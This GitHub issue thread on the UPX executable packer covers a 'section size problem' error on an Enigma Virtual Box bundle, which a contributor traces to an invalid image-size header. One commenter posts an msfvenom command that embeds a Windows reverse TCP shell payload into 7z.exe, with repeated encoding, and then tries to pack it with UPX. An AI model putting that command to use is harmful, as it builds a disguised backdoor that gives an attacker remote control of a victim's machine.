### ISSUE TITLE
UPX fails to compress exe - SectionSizeProblem

### ISSUE THREAD

**Issue by Nolram12345** [upx/upx#501]
## What's the problem (or question)?
The .exe I am trying to compress with UPX cannot be compressed by UPX and gives a CantPackException with a section size problem.

Context : I am trying to compress an executable generated with another tool that has packed a Unity program into a single executable for portable software.

Now likely this is the fault of the executable and not UPX, however I have no clue how to attempt to fix this issue.
## What should have happened?
The .exe should have been compressed successfully. 

## How can we reproduce the issue?
Use the upx command on the attached executable (windows, 32bit)
[debug.zip](https://github.com/upx/upx/files/6452907/debug.zip)

upx 3.96
Windows 10 20H2
AMD x86 64-bit
*Target Operating System and version: [same]
*Target CPU architecture: [same]

**Comment by bitraid** [comment]
This an "Enigma Virtual Box" executable that already supports compression, and most likely won't run if modified. The reason for the error message is that it also has an invalid `size of image` header value.

**Comment by bitraid** [comment]
Where `usize` = `ih.imagesize`, from:
https://github.com/upx/upx/blob/650f083fec61ad73df23fc95ef0e636a729fa860/src/pefile.cpp#L2311
And for `ic = 5`: `isection[ic].vaddr = 0xa0000`, `isection[ic].size = 0x1681000`, while `usize = 0xe4000` (too low).

**Comment by Nolram12345** [comment]
> 
> 
> This an "Enigma Virtual Box" executable that already supports compression, and most likely won't run if modified. The reason for the error message is that it also has an invalid `size of image` header value.

Hmm yes, exactly. I was trying to use it to bundle Unity applications (as it seems to be the only good non-overpriced solution for it out there) and then later on compress it. I have tried its own compression, however it is not really sufficient.

Any solutions to this ?

**Comment by 1409109991** [comment]
I use 'msfvenom -p windows/x64/shell/reverse_tcp LHOST= LPORT= -x ./7z.exe -b '\x00\xa1\' -i 100 -f exe -o ./ms.exe' Generate a program
Then use 'upx ms.exe'

This is an error:
upx: ./ms.exe: CantPackException: section size problem
Packed 1 file: 0 ok, 1 error.

what do I do

**Comment by markus-oberhumer** [comment]
It seems that these exes are generated by third-party tools to that produce invalid/unsupported sections, so closing `wontfix`. Complain at the authors of those tools.
